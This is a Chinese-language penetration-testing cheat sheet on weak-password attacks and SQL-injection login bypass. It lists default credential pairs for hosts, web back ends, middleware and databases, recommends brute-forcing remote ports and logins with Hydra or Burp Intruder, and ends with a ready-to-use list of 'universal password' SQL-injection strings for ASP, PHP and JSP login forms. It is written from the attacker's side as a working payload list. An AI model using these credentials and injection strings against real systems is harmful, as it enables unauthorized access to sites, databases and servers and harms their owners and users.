一、弱口令:
1、弱口令介紹
一般弱口令為系統默認密碼或設置的簡單密碼,這些密碼非常容易被攻擊者猜到。在實際的滲透測試中,弱口令是一個攻擊難度低,攻擊成功率偏高的漏洞。
2、弱口令一般出現在什么地方呢?
對於Web層面就是后台管理員登錄、普通用戶登錄等;
對於中間件層面就是MySQL弱口令、msSQL弱口令、Oracle弱口令、DB2弱口令、WebLogic弱口令、Tomcat弱口令及phpMyAdmin弱口令等;
對於系統層面就是ftp弱口令、3389弱口令、ssh弱口令、telnet弱口令及網關與路由登錄弱口令等。
3、弱口令一般攻擊什么地方呢?
弱口令一般直接對后台管理員登錄界面及遠程3389 /21/22/23/1433/3306/1521等服務端口進行攻擊。
因此,我們還得先研究下怎么找到這些后台及服務端口的入口。
4、后台和服務器的入口
對於后台,推薦使用GoogleHack、GitHubHack、robots.txt及SVN或者GIT代碼泄露等;對於遠程服務端口就得分類了,ftp有ftp暴破工具,ssh有ssh暴破工具,
3389有3389暴破工具,我們可以根據具體的情況使用不同的工具加載適當的弱口令對遠程端口進行暴力破解。
5、任何一種類型的漏洞,都沒有弱口令來得簡單、奏效。它的危害也是十分大的
6、某站遭到弱口令攻擊,弱口令攻擊有三類方法:手動使用經驗攻擊;使用弱密碼破解;使用彩虹表破解。
6.1、對於第一類,手動輸入
遇到主機輸入administrator/123456、administrator /abcd-1234、Guest/Guest、root/root等;
遇到Web后台輸入admin/admin、admin/admin888、PHPCMS/PHPCMS等;遇到中間件輸入admin/admin、manager/admin、root/admin、WebLogic/WebLogic、Tomcat/Tomcat等;
遇到數據庫輸入root/root、root/root123、root/123456、sa/sa、sa/as、system/manager、scott/tiger等。
其實,就是利用人性的一些弱點來攻擊Web站點(人們安全意識不強,沒有修改默認密碼)。
6.2、對於第二類,可以使用burpsuite-intruder或者Hydra等工具直接加載wordlist弱口令破解(前提是無驗證碼,或者繞過驗證碼,或者沒有登錄次數限制)。可以
在網上下載wordlist弱口令,針對不同的系統下載不同的wordlist,這樣破解起來成功的概率會更大一些。
6.3、對於第三類,是在實在沒有辦法而且系統很重要的情況下才可以采用的。
7、弱口令的危害
有了弱口令危害就意味着不論您在其他方面做了多少努力,攻擊者依然可以很輕松的突破您的邊界,使得那些強大的安全設備通通淪為擺設。
抱歉,弱口令是真的可以為所欲為
8、弱口令的幾種類型,以及各種組合
簡單數字組合:123123 123456 12345678 654321 666666 888888
順序字符組合:abcdef abcabc abc123 a1b2c3 aaa111
臨近字符組合:123qwe Qwerty qweasd
特殊含義組合:admin password p@ssword passwd Iloveyou 5201314
關鍵詞+鏈接符+弱口令:xxx@123
首字母大寫+關鍵詞+鏈接符+弱口令:Xxx@123
關鍵詞加+數字:XXXX123
關鍵詞+拱鍵盤:XXXX1qaz
關鍵詞+鏈接符+拱鍵盤:XXXXX@1qaz
二、萬能密碼:
這里我只總結一些常用的萬能密碼
asp aspx萬能密碼
1:"or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11:1 or '1'='1'=1
12:1 or '1'='1' or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15:'xor
16: 用戶名 ' UNION Select 1,1,1 FROM admin Where ''=' (替換表名admin)
密碼 1
17..admin' or 'a'='a 密碼隨便
PHP萬能密碼
'or 1=1/*
User: something
Pass: ' or '1'='1
jsp 萬能密碼
1'or'1'='1
admin' or 1=1/*